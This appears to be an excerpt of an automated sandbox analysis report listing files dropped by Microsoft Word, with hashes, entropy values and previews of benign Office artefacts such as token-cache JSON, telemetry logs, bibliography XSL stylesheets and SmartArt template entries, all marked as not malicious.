                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.Y.X.k.N.j.N.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.R.x.0.e.n.j.
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4542
                                        Entropy (8bit):4.004544025631226
                                        Encrypted:false
                                        SSDEEP:48:uiTrlKxxx0xD9Il8u96tztLsTi/MBo5S9t8ZJz1h2NYAUcPIHmxBxaVid+6AnxUs:3Y76hps2E65CIJB6YA4Hu7dFAO5fUyFu
                                        MD5:967D5208C05D04C5FEE8489AEB865472
                                        SHA1:44605DF49C8AAB64BEE9BC8BE9EF865CE6464C94
                                        SHA-256:73F70A29BE9314ACABCE67F36228675C7DDAB8179D84B2CFCD5CB5EC746606E4
                                        SHA-512:632348DE37922B18CFEC582772D8C58EE945C83A696D864EE0B55C95D70711ABABAA38DC6F1700ADC4F59F68637E2C680365CA03BA4C006CC6A111999B3CFD3C
                                        Malicious:false
                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".n.F.E.2.B.W.J.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.R.x.0.e.n.j.
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2526
                                        Entropy (8bit):3.6977608285692836
                                        Encrypted:false
                                        SSDEEP:24:445nc9A02WMCtb4IkcRwdt/SCUAot4In3c6FM5jKBuqt0ZLsh:xncOAMCV1hRwrUAoKKcFjKMflsh
                                        MD5:1E527F3E2EF2470E65E7262406A65AD6
                                        SHA1:62548154DFD2BC146BB4B7044908E93CE1423148
                                        SHA-256:3C17D57C77CAF6FD4DB9307F36E7BA7B7F02990EE5E39351EF4BDB2386A35317
                                        SHA-512:57C2ACC65D11EE74F587D4D5C0F9C3C802B0944F4BADD4E69E78196A248F6347F56154BD95AE3D1FE0C85A3172093198298067A8297E01B130FB8A274321807F
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:ASCII text, with very long lines (1351), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):20971520
                                        Entropy (8bit):0.015390051244227574
                                        Encrypted:false
                                        SSDEEP:1536:1UTK03SQFgwFXJjAVWrxbhEpY7o/YvwpEGZ81zB:qfg2
                                        MD5:57DCAA089299EA0A048A68D803504353
                                        SHA1:C28B82718010D0BE0C992E6592EA4C0D9371BCAA
                                        SHA-256:C6D0778198B8696C7B01DEB7659ABB94C4BE708CF13F79D86BC23D3C82B5BA5F
                                        SHA-512:B795963427535F35B08DC8AA661496E9A0C31F9398163CCD451BC71641FCA51936DD0FD4C0999DA0D254E314548CCD4EACCF87B7C362F47967FC4BEC3600DAEA
                                        Malicious:false
                                        Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/18/2024 15:30:12.586.WINWORD (0x1DE8).0x1E5C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-12-18T15:30:12.586Z","Contract":"Office.System.Activity","Activity.CV":"5oqLaGnpKU+Bcz6XT4i4iQ.7.1","Activity.Duration":398,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...12/18/2024 15:30:12.586.WINWORD (0x1DE8).0x1E5C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-12-18T15:30:12.586Z","Contract":"Office.System.Activity","Activity.CV":"5oqLaGnpKU+Bcz6XT4i4iQ.7","Activity.Duration":2863,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureD
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20971520
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                        SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                        SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                        SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):302
                                        Entropy (8bit):3.537169234443227
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                        MD5:9C00979164E78E3B890E56BE2DF00666
                                        SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                        SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                        SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                        Malicious:false
                                        Preview:[File]..OriginalName: iso690nmerical.xsl..Component: WordFiles..ReqVer: 14..Executable: {WD}..StoreLocation: {My Templates}..Command: /f {FilePath}....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):217137
                                        Entropy (8bit):5.068335381017074
                                        Encrypted:false
                                        SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                        MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                        SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                        SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                        SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):314
                                        Entropy (8bit):3.5230842510951934
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                        MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                        SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                        SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                        SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                        Malicious:false
                                        Preview:[File]..OriginalName: ieee2006officeonline.xsl..Component: WordFiles..ReqVer: 14..Executable: {WD}..StoreLocation: {My Templates}..Command: /f {FilePath}....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):294178
                                        Entropy (8bit):4.977758311135714
                                        Encrypted:false
                                        SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                        MD5:0C9731C90DD24ED5CA6AE283741078D0
                                        SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                        SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                        SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):254
                                        Entropy (8bit):3.4721586910685547
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                        MD5:4DD225E2A305B50AF39084CE568B8110
                                        SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                        SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                        SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                        Malicious:false
                                        Preview:[File]..OriginalName: chevronaccent.glox..Component: WordFiles..ReqVer: 14..StoreLocation: {My Templates}\SmartArt Graphics....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4243
                                        Entropy (8bit):7.824383764848892
                                        Encrypted:false
                                        SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                        MD5:7BC0A35807CD69C37A949BBD51880FF5
                                        SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                        SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                        SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4026
                                        Entropy (8bit):7.809492693601857
                                        Encrypted:false
                                        SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                        MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                        SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                        SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                        SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):250
                                        Entropy (8bit):3.4916022431157345
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                        MD5:1A314B08BB9194A41E3794EF54017811
                                        SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                        SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                        SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                        Malicious:false
                                        Preview:[File]..OriginalName: BracketList.glox..Component: WordFiles..ReqVer: 14..StoreLocation: {My Templates}\SmartArt Graphics....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):278
                                        Entropy (8bit):3.5280239200222887
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                        MD5:877A8A960B2140E3A0A2752550959DB9
                                        SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                        SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                        SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):268317
                                        Entropy (8bit):5.05419861997223
                                        Encrypted:false
                                        SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                        MD5:51D32EE5BC7AB811041F799652D26E04
                                        SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                        SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                        SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):242
                                        Entropy (8bit):3.4938093034530917
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                        MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                        SHA1:BA15D036D522978409846EA682A1D7778381266F
                                        SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                        SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):4888
                                        Entropy (8bit):7.8636569313247335
                                        Encrypted:false
                                        SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                        MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                        SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                        SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                        SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):258
                                        Entropy (8bit):3.4692172273306268
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                        MD5:C1B36A0547FB75445957A619201143AC
                                        SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                        SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                        SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):7370
                                        Entropy (8bit):7.9204386289679745
                                        Encrypted:false
                                        SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                        MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                        SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                        SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                        SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):280
                                        Entropy (8bit):3.484503080761839
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                        MD5:1309D172F10DD53911779C89A06BBF65
                                        SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                        SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                        SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):9191
                                        Entropy (8bit):7.93263830735235
                                        Encrypted:false
                                        SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                        MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                        SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                        SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                        SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):238
                                        Entropy (8bit):3.472155835869843
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                        MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                        SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                        SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                        SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5151
                                        Entropy (8bit):7.859615916913808
                                        Encrypted:false
                                        SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                        MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                        SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                        SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                        SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):254
                                        Entropy (8bit):3.4845992218379616
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                        MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                        SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                        SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
